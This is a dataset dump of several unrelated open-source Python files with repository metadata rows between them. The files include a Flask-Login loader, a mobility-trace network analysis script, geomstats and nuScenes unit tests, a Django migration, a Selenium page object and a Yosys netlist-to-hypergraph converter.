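# An equivalent sketch using collections.Counter (an alternative, not part of the
# original exercise): the deletion count is the sum of absolute per-letter count
# differences between the two strings.
from collections import Counter
def deletions_to_anagram(s1, s2):
    c1, c2 = Counter(s1), Counter(s2)
    return sum((c1 - c2).values()) + sum((c2 - c1).values())
print(deletions_to_anagram(a, b))  # prints 4 for a='ceed', b='acbeef', matching min_num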
| 30.894737
| 83
| 0.70017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 824
| 0.701874
|
49e795b64e0b3cac7465448efafac4bd98ed4236
| 267
|
py
|
Python
|
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | 2
|
2017-02-06T15:42:27.000Z
|
2021-01-14T15:13:08.000Z
|
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | null | null | null |
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | 6
|
2016-07-30T19:57:19.000Z
|
2019-08-06T03:44:54.000Z
|
from flask_login import LoginManager
from PhoenixNow.model import User
login_manager = LoginManager()
login_manager.login_view = "regular.signin"
@login_manager.user_loader
def load_user(user_id):
user = User.query.filter_by(id=user_id).first()
return user
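# Hedged wiring sketch (create_app and the secret key below are placeholders, not taken
# from this repository): the LoginManager defined above only takes effect once it is
# bound to the Flask application, typically via init_app.
from flask import Flask
def create_app():
    app = Flask(__name__)
    app.config['SECRET_KEY'] = 'change-me'  # placeholder value for the sketch
    login_manager.init_app(app)  # attach the manager defined in this module
    return app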
| 24.272727
| 51
| 0.794007
| 0
| 0
| 0
| 0
| 118
| 0.441948
| 0
| 0
| 16
| 0.059925
|
49e8bc016b4a92e63bbff49dadf2d0f5ff48a5c0
| 7,673
|
py
|
Python
|
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
import os
import datetime as dt
import random
import networkx
# import matplotlib as mpl
import matplotlib.pyplot as plt
from const import *
activity = {}
with open(os.path.join(DATA_DIR, "mobiclique", "activity.csv")) as activity_fd:
for line in activity_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
user_id, start_ts, end_ts = line.split(';')
if user_id not in activity:
activity[user_id] = []
activity[user_id].append( (int(start_ts), int(end_ts)) )
def is_awake(user_id, ts, activity):
for start_ts, end_ts in activity.get(user_id, []):
if ts >= start_ts and ts <= end_ts:
return True
return False
transmission = {}
with open(os.path.join(DATA_DIR, "mobiclique", "transmission.csv")) as transmission_fd:
for line in transmission_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
msg_type, msg_id, bytes, src_user_id, dst_user_id, ts, status = line.split(';')
#if status != '0':
# continue
if src_user_id not in transmission:
transmission[src_user_id] = {}
if dst_user_id not in transmission[src_user_id]:
transmission[src_user_id][dst_user_id] = []
ts = int(ts)
transmission[src_user_id][dst_user_id].append(ts)
reception = {}
with open(os.path.join(DATA_DIR, "mobiclique", "reception.csv")) as reception_fd:
for line in reception_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
msg_type, msg_id, src_user_id, dst_user_id, ts = line.split(';')
if src_user_id not in reception:
reception[src_user_id] = {}
if dst_user_id not in reception[src_user_id]:
reception[src_user_id][dst_user_id] = []
ts = int(ts)
reception[src_user_id][dst_user_id].append(ts)
drift_dict = {}
for src_user_id in sorted(reception):
for dst_user_id in sorted(reception[src_user_id]):
for rcp_ts in reception[src_user_id][dst_user_id]:
if src_user_id not in transmission:
continue
transmissions = transmission[src_user_id].get(dst_user_id, None)
if transmissions is None:
continue
if (src_user_id, dst_user_id) not in drift_dict:
drift_dict[(src_user_id, dst_user_id)] = []
diff = [abs(rcp_ts - trn_ts) for trn_ts in transmissions]
idx = diff.index(min(diff))
trn_ts = transmission[src_user_id][dst_user_id][idx]
drift = trn_ts - rcp_ts
drift_dict[(src_user_id, dst_user_id)].append((trn_ts, drift))
for (src_user_id, dst_user_id) in sorted(drift_dict):
print src_user_id, dst_user_id, drift_dict[(src_user_id, dst_user_id)]
break
proximity = {}
with open(os.path.join(DATA_DIR, "mobiclique", "proximity.csv")) as proximity_fd:
for line in proximity_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
ts, user_id, seen_user_id, major_code, minor_code = line.split(';')
ts = int(ts)
if ts not in proximity:
proximity[ts] = []
proximity[ts].append((user_id, seen_user_id))
def visit(node, edges, unvisited):
if node not in unvisited:
return []
unvisited.remove(node)
my_network = [node]
for (node1, node2) in edges:
if node == node1 and node2 in unvisited:
my_network.extend(visit(node2, edges, unvisited))
elif node == node2 and node1 in unvisited:
my_network.extend(visit(node1, edges, unvisited))
return my_network
def get_networks(nodes, edges):
networks = []
unvisited = list(nodes)
while unvisited:
node = unvisited[0]
my_network = []
networks.append(visit(node, edges, unvisited))
return map(sorted,(map(set,networks)))
MAX_RNG = 75
timestamps = sorted(proximity)
#write traces to user.dat files
if 0:
user_fds = {}
for ts in timestamps:
for (user_id, seen_id) in proximity[ts]:
if user_id not in user_fds:
fd = open(r"mobiclique\%s.dat" % user_id, 'w')
last_ts = -1
user_fds[user_id] = [fd, last_ts]
else:
[fd, last_ts] = user_fds[user_id]
if last_ts != ts:
if last_ts > 0:
fd.write('\n')
fd.write("{} {} {}".format(ts, user_id, seen_id))
else:
fd.write(",{}".format(seen_id))
user_fds[user_id][1] = ts
for (fd, last_ts) in user_fds.values():
fd.close()
# Graph using networkx
if 1:
idx = random.sample(xrange(len(timestamps)), 25)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
G = networkx.Graph(edges)
networkx.draw(G)
fig_fname = os.path.join(r"C:\Users\Jon\Google Drive\Grad_School\CS 538\project\scripts\figures", "%s.png" % ts)
plt.savefig(fig_fname)
plt.close()
networks = []
n_networks = []
max_size = []
idx = random.sample(xrange(len(timestamps)), 1500)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
nodes = sorted(set(reduce(list.__add__, map(list, edges))))
new_networks = get_networks(nodes, edges)
networks.append(new_networks)
n_networks.append(len(new_networks))
max_size.append(max(map(len,new_networks)))
fd = open("output2.csv", 'w')
for vals in zip(sample_dts, n_networks, max_size):
fd.write(','.join(map(str,(vals))))
fd.write('\n')
fd.close()
# Get networks
if 0:
networks = []
n_networks = []
max_size = []
idx = random.sample(xrange(len(timestamps)), 1500)
idx.sort()
sample_timestamps = map(timestamps.__getitem__, idx)
sample_dts = map(lambda ts: START_DT + dt.timedelta(seconds=ts),sample_timestamps)
for ts in sample_timestamps:
other_timestamps = filter(lambda x: abs(x-ts) < MAX_RNG, timestamps)
edges = sorted(set(reduce(list.__add__, [proximity[x] for x in other_timestamps])))
nodes = sorted(set(reduce(list.__add__, map(list, edges))))
new_networks = get_networks(nodes, edges)
networks.append(new_networks)
n_networks.append(len(new_networks))
max_size.append(max(map(len,new_networks)))
fd = open("output2.csv", 'w')
for vals in zip(sample_dts, n_networks, max_size):
fd.write(','.join(map(str,(vals))))
fd.write('\n')
fd.close()
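# Hedged alternative sketch (not part of the original script): an iterative depth-first
# search computes the same connected components as visit()/get_networks() without
# risking Python's recursion limit on large proximity graphs.
def get_networks_iterative(nodes, edges):
    adjacency = {n: set() for n in nodes}
    for n1, n2 in edges:
        adjacency[n1].add(n2)
        adjacency[n2].add(n1)
    unvisited = set(nodes)
    networks = []
    while unvisited:
        stack = [next(iter(unvisited))]
        component = set()
        while stack:
            node = stack.pop()
            if node in unvisited:
                unvisited.remove(node)
                component.add(node)
                stack.extend(adjacency[node] & unvisited)
        networks.append(sorted(component))
    return networks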
| 37.247573
| 121
| 0.59377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 443
| 0.057735
|
49ea4f99ec3b4e468aba9dc32ef313173fda7ba3
| 6,995
|
py
|
Python
|
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | 2
|
2020-01-23T04:01:02.000Z
|
2020-08-18T19:20:27.000Z
|
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | null | null | null |
tests/tests_geomstats/test_general_linear.py
|
tfunatomi/geomstats
|
a5651680f98dea95c1f82a48af1a6dccf3e26bd1
|
[
"MIT"
] | null | null | null |
"""Unit tests for the General Linear group."""
import warnings
import tests.helper as helper
import geomstats.backend as gs
import geomstats.tests
from geomstats.geometry.general_linear import GeneralLinear
RTOL = 1e-5
class TestGeneralLinear(geomstats.tests.TestCase):
def setUp(self):
gs.random.seed(1234)
self.n = 3
self.n_samples = 2
self.group = GeneralLinear(n=self.n)
self.group_pos = GeneralLinear(self.n, positive_det=True)
warnings.simplefilter('ignore', category=ImportWarning)
def test_belongs_shape(self):
mat = gs.eye(3)
result = self.group.belongs(mat)
self.assertAllClose(gs.shape(result), ())
mat = gs.ones((3, 3))
result = self.group.belongs(mat)
self.assertAllClose(gs.shape(result), ())
def test_belongs(self):
mat = gs.eye(3)
result = self.group.belongs(mat)
expected = True
self.assertAllClose(result, expected)
mat = gs.ones((3, 3))
result = self.group.belongs(mat)
expected = False
self.assertAllClose(result, expected)
mat = gs.ones(3)
result = self.group.belongs(mat)
expected = False
self.assertAllClose(result, expected)
def test_belongs_vectorization_shape(self):
mats = gs.array([gs.eye(3), gs.ones((3, 3))])
result = self.group.belongs(mats)
self.assertAllClose(gs.shape(result), (2,))
def test_belongs_vectorization(self):
mats = gs.array([gs.eye(3), gs.ones((3, 3))])
result = self.group.belongs(mats)
expected = gs.array([True, False])
self.assertAllClose(result, expected)
def test_random_and_belongs(self):
for group in [self.group, self.group_pos]:
point = group.random_point()
result = group.belongs(point)
self.assertTrue(result)
def test_random_and_belongs_vectorization(self):
n_samples = 4
expected = gs.array([True] * n_samples)
for group in [self.group, self.group_pos]:
point = group.random_point(n_samples)
result = group.belongs(point)
self.assertAllClose(result, expected)
def test_compose(self):
mat1 = gs.array([
[1., 0.],
[0., 2.]])
mat2 = gs.array([
[2., 0.],
[0., 1.]])
result = self.group.compose(mat1, mat2)
expected = 2. * GeneralLinear(2).identity
self.assertAllClose(result, expected)
def test_inv(self):
mat_a = gs.array([
[1., 2., 3.],
[4., 5., 6.],
[7., 8., 10.]])
imat_a = 1. / 3. * gs.array([
[-2., -4., 3.],
[-2., 11., -6.],
[3., -6., 3.]])
expected = imat_a
result = self.group.inverse(mat_a)
self.assertAllClose(result, expected)
def test_inv_vectorized(self):
mat_a = gs.array([
[0., 1., 0.],
[1., 0., 0.],
[0., 0., 1.]])
mat_b = - gs.eye(3, 3)
result = self.group.inverse(gs.array([mat_a, mat_b]))
expected = gs.array([mat_a, mat_b])
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_log_and_exp(self):
point = 5 * gs.eye(self.n)
group_log = self.group.log(point)
result = self.group.exp(group_log)
expected = point
self.assertAllClose(result, expected)
def test_exp_vectorization(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
expected = gs.array([[[7.38905609, 0., 0.],
[0., 20.0855369, 0.],
[0., 0., 54.5981500]],
[[2.718281828, 0., 0.],
[0., 148.413159, 0.],
[0., 0., 403.42879349]]])
expected = gs.cast(expected, gs.float64)
point = gs.cast(point, gs.float64)
result = self.group.exp(point)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_log_vectorization(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
expected = gs.array([[[0.693147180, 0., 0.],
[0., 1.09861228866, 0.],
[0., 0., 1.38629436]],
[[0., 0., 0.],
[0., 1.609437912, 0.],
[0., 0., 1.79175946]]])
result = self.group.log(point)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_orbit(self):
point = gs.array([
[gs.exp(4.), 0.],
[0., gs.exp(2.)]])
sqrt = gs.array([
[gs.exp(2.), 0.],
[0., gs.exp(1.)]])
identity = GeneralLinear(2).identity
path = GeneralLinear(2).orbit(point)
time = gs.linspace(0., 1., 3)
result = path(time)
expected = gs.array([identity, sqrt, point])
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_orbit_vectorization(self):
point = gs.array([
[gs.exp(4.), 0.],
[0., gs.exp(2.)]])
sqrt = gs.array([
[gs.exp(2.), 0.],
[0., gs.exp(1.)]])
identity = GeneralLinear(2).identity
path = GeneralLinear(2).orbit(gs.stack([point] * 2), identity)
time = gs.linspace(0., 1., 3)
result = path(time)
expected = gs.array([identity, sqrt, point])
expected = gs.stack([expected] * 2)
self.assertAllClose(result, expected)
@geomstats.tests.np_and_tf_only
def test_expm_and_logm_vectorization_symmetric(self):
point = gs.array([[[2., 0., 0.],
[0., 3., 0.],
[0., 0., 4.]],
[[1., 0., 0.],
[0., 5., 0.],
[0., 0., 6.]]])
result = self.group.exp(self.group.log(point))
expected = point
self.assertAllClose(result, expected)
def test_projection_and_belongs(self):
shape = (self.n_samples, self.n, self.n)
result = helper.test_projection_and_belongs(self.group, shape)
for res in result:
self.assertTrue(res)
def test_projection_and_belongs_pos(self):
shape = (self.n_samples, self.n, self.n)
result = helper.test_projection_and_belongs(self.group_pos, shape)
for res in result:
self.assertTrue(res)
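# Hedged numeric cross-check (scipy-based, independent of the geomstats backend used in
# the tests above): the hard-coded expectations in test_exp_vectorization are simply the
# elementwise exponentials of the diagonal entries.
import numpy as np
from scipy.linalg import expm
print(np.round(expm(np.diag([2., 3., 4.])), 4))
# diag(7.3891, 20.0855, 54.5982), matching the first expected block of the test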
| 32.840376
| 74
| 0.501358
| 6,769
| 0.967691
| 0
| 0
| 2,496
| 0.356826
| 0
| 0
| 54
| 0.00772
|
49eb7a1d598ee46402c3d994c365fef1314082ef
| 454
|
py
|
Python
|
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03-06.py
|
python-feladatok-tesztekkel/05-01-10-dolgozat
|
ce1c8568daf83dc86bba1fb325cb7b8d1cf0dd3f
|
[
"CC0-1.0"
] | null | null | null |
from unittest import TestCase
import os,sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import feladatok
class TestEBetukSzama6(TestCase):
def test_feladat06(self):
aktualis = feladatok.ebetuk_szama("")
elvart = 0
self.assertEqual(elvart, aktualis, "Nem jól határozta meg az e vagy é betűk számát")
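# Hedged sketch of the function under test (the real feladatok.ebetuk_szama is not shown
# in this file; this is just one implementation that would satisfy the assertion above):
def ebetuk_szama(szoveg):
    """Return how many 'e' or 'é' letters the text contains."""
    return sum(1 for betu in szoveg if betu in 'eé')
# ebetuk_szama("") == 0, as the test expects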
| 32.428571
| 92
| 0.746696
| 227
| 0.493478
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.121739
|
49ebafbb9bb001087a55a6aebb22dbde9671371c
| 271
|
py
|
Python
|
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/pages/main_page.py
|
victory-sokolov/selenium-boilerplate
|
43ac0e37c93c6379186f06050ab29e8521ac3ad1
|
[
"MIT"
] | null | null | null |
from utils.Driver import Driver
from pages.base_page import BasePage
from pages.locators import MainPageLocators
class MainPage(BasePage):
def __init__(self, driver: Driver):
self.locators = MainPageLocators
super().__init__(driver=driver)
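# Hedged sketch (the real pages/locators.py is not included here; the locator names and
# selectors below are assumptions): MainPageLocators is expected to expose Selenium
# locator tuples along these lines.
from selenium.webdriver.common.by import By
class MainPageLocatorsSketch:
    SEARCH_INPUT = (By.NAME, 'q')  # hypothetical locator
    SUBMIT_BUTTON = (By.CSS_SELECTOR, 'button[type="submit"]')  # hypothetical locator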
| 27.1
| 44
| 0.734317
| 151
| 0.557196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
49edf4b8c87add119d94e632341ab23299a577d3
| 1,726
|
py
|
Python
|
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
boardgames/main/migrations/0001_initial.py
|
diophung/django-sample
|
4916f4aa70506f6f40b736f68a0bbe398ea1ea8e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-16 07:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.DateTimeField(auto_now_add=True)),
('last_active', models.DateTimeField(auto_now=True)),
('first_player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='game_first_player', to=settings.AUTH_USER_MODEL)),
('next_to_move', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games_to_move', to=settings.AUTH_USER_MODEL)),
('second_player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='game_second_player', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Move',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('x', models.IntegerField()),
('y', models.IntegerField()),
('comment', models.CharField(max_length=300)),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Game')),
],
),
]
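# Hedged sketch (field names and options are read off the migration above; the real
# main/models.py is not included in this record): the models this initial migration creates.
from django.conf import settings
from django.db import models
class Game(models.Model):
    start_time = models.DateTimeField(auto_now_add=True)
    last_active = models.DateTimeField(auto_now=True)
    first_player = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,
                                     related_name='game_first_player')
    second_player = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,
                                      related_name='game_second_player')
    next_to_move = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,
                                     related_name='games_to_move')
class Move(models.Model):
    x = models.IntegerField()
    y = models.IntegerField()
    comment = models.CharField(max_length=300)
    game = models.ForeignKey(Game, on_delete=models.CASCADE)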
| 42.097561
| 162
| 0.636153
| 1,502
| 0.87022
| 0
| 0
| 0
| 0
| 0
| 0
| 253
| 0.146582
|
49ee2e293e1b411f588dd752ab4762901a62db20
| 7,801
|
py
|
Python
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 475
|
2021-03-13T16:33:36.000Z
|
2022-03-30T06:00:39.000Z
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 50
|
2021-03-17T04:48:20.000Z
|
2022-03-08T13:55:32.000Z
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py
|
jie311/TraDeS
|
896491a159abe65f61c6ad05662cda6e28d137a6
|
[
"MIT"
] | 98
|
2021-03-14T12:12:49.000Z
|
2022-03-19T16:19:13.000Z
|
import math
import unittest
import torch
from nuscenes.prediction.models import mtp
class TestMTPLoss(unittest.TestCase):
"""
Test each component of MTPLoss as well as the
__call__ method.
"""
def test_get_trajectories_and_modes(self):
loss_n_modes_5 = mtp.MTPLoss(5, 0, 0)
loss_n_modes_1 = mtp.MTPLoss(1, 0, 0)
xy_pred = torch.arange(60).view(1, -1).repeat(1, 5).view(-1, 60)
mode_pred = torch.arange(5).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing many modes with batch size 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing many modes with batch size > 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
xy_pred = torch.arange(60).view(1, -1).repeat(1, 1).view(-1, 60)
mode_pred = torch.arange(1).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing one mode with batch size 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing one mode with batch size > 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
def test_angle_between_trajectories(self):
def make_trajectory(last_point):
traj = torch.zeros((12, 2))
traj[-1] = torch.Tensor(last_point)
return traj
loss = mtp.MTPLoss(0, 0, 0)
# test angle is 0.
self.assertEqual(loss._angle_between(make_trajectory([0, 0]), make_trajectory([0, 0])), 0.)
self.assertEqual(loss._angle_between(make_trajectory([15, 15]), make_trajectory([15, 15])), 0.)
# test angle is 15.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([math.sqrt(3)/2, 0.5])), 15., places=4)
# test angle is 30.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([math.sqrt(3)/2, 0.5])), 30., places=4)
# test angle is 45.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([0, 1])), 45., places=4)
# test angle is 90.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([-1, 1])), 90., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([0, 1])), 90., places=4)
# test angle is 180.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([-1, 0])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([0, 1]),
make_trajectory([0, -1])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([3, 1]),
make_trajectory([-3, -1])), 180., places=4)
def test_compute_best_mode_nothing_below_threshold(self):
angles = [(90, 0), (80, 1), (70, 2)]
target = None
traj = None
loss = mtp.MTPLoss(3, 0, 5)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
loss = mtp.MTPLoss(3, 0, 65)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
def test_compute_best_mode_only_one_below_threshold(self):
angles = [(30, 1), (3, 0), (25, 2)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_compute_best_mode_multiple_below_threshold(self):
angles = [(2, 2), (4, 1), (10, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
trajectory[1] = 1
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 1)
def test_compute_best_mode_only_one_mode(self):
angles = [(25, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((1, 6, 2))
loss = mtp.MTPLoss(1, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
trajectory[0] = 1
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_loss_single_mode(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 61))
predictions[:, :60] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, 60] = 1/10
loss = mtp.MTPLoss(1, 1, angle_threshold_degrees=20)
# Only regression loss in single mode case.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
0, places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, :60] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()), 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, :60] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
(15/16)*0.5,
places=4)
def test_loss_many_modes(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 610))
predictions[:, 540:600] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, -10:] = 1/10
loss = mtp.MTPLoss(10, 1, angle_threshold_degrees=20)
# Since one mode exactly matches gt, loss should only be classification error.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10), places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, 540:600] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, 540:600] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + (15/16)*0.5,
places=4)
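# Hedged side note (not part of the test suite): the 0.5 offsets asserted above follow
# from the definition of smooth L1 loss, which is 0.5*d**2 for |d| < 1 and |d| - 0.5
# otherwise. A quick standalone check:
import torch
import torch.nn.functional as F
d = torch.tensor([0.5, 1.0, 2.0])
print(F.smooth_l1_loss(d, torch.zeros_like(d), reduction='none'))
# tensor([0.1250, 0.5000, 1.5000]) -> 0.5*0.25, 1.0-0.5, 2.0-0.5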
| 42.396739
| 106
| 0.58313
| 7,711
| 0.988463
| 0
| 0
| 0
| 0
| 0
| 0
| 849
| 0.108832
|
49ef52693c6a396a1581cc399d1886b8613380b6
| 1,067
|
py
|
Python
|
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
json2graph.py
|
daveshah1/hypergraph_part
|
cea56e615eec01cb536ed23206ed101c213864a5
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python3
# Convert Yosys JSON to simple text hypergraph for performance testing
import sys, json
node_count = 0
edge2node = {}
netlist = None
with open(sys.argv[1]) as jf:
netlist = json.load(jf)
top_module = None
for name, module in sorted(netlist["modules"].items()):
if "attributes" not in module:
continue
if "top" not in module["attributes"]:
continue
if int(module["attributes"]["top"]) == 0:
continue
top_module = module
break
for cname, cell in sorted(top_module["cells"].items()):
if "connections" not in cell:
continue
for pname, bits in sorted(cell["connections"].items()):
for bit in bits:
if bit in ("0", "1", "x", "z"):
continue
if bit not in edge2node:
edge2node[bit] = set()
edge2node[bit].add(node_count)
node_count += 1
with open(sys.argv[2], "w") as hf:
print("{} {}".format(node_count, len(edge2node)), file=hf)
for n in range(node_count):
print("N 0 0", file=hf)
for e, nodes in sorted(edge2node.items()):
print("E 1 {}".format(" ".join([str(x) for x in sorted(nodes)])), file=hf)
| 24.25
| 76
| 0.665417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 220
| 0.206186
|
